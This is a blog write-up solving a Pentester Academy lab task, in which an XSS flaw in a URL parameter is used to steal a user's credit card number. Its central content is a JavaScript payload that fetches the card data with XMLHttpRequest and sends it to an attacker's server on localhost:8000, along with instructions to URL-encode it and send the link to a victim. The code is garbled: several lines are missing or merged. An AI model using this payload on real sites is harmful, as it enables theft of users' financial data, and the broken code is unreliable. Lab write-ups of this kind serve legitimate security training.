Javascript for Pentester Task 15

Hello pentesters, today I am going to post another solution to the task provided at Javascript for Pentester at Pentester Academy. In this task, we learn more about how to use XML XMLHttpRequest method to fetch data and post to the attacker on the go without users concern. You can view solutions to the other tasks here.

Task 15: Data Exfiltration with XMLHttpRequest | TASK LINK

The task is to find John’s Credit Card number using an XSS vulnerability on that page. This task is of moderate level, you have to have the knowledge of XMLHttpRequest method. You should know what is the syntax and how to use it.
The injection point is the same as in previous tasks is the url parameter, You can apply some injections to verify that too. While viewing the source code you will see this comment ” Credit Card can be obtained via a POST request to /lab/webapp/jfp/15/cardstore with params user=johnin the source code, that may have been written by the developer. You have to use POST request with “user” parameter is “john”.

var req1 = new XMLHttpRequest();
req1.onreadystatechange = function(){
if (this.status == 200 && this.readyState == 4)
var data = this.responseText;
var req2 = new XMLHttpRequest();'GET','http://localhost:8000/f?'+data,true);
req1.setRequestHeader("Content-type", "application/x-www-form-urlencoded");

This code will create an XML request to the commented link and retrieve the response in text format and put that into the variable “data” and then create another XML request which would go and send that “data” to our attacker server. Again in this case you can run Simple HTTP sever module of Python to catch the request. Copy and URL-encode the code and paste it after the ’url’ parameter on the same page and send it the Victim, which would when opens the page, sends the credit card details to the attacker machine.
Refer this post as a quick solution to the Javascript for Pentester tasks. For in-depth video tutorials, please refer to the video solutions provided at Pentester Academy website.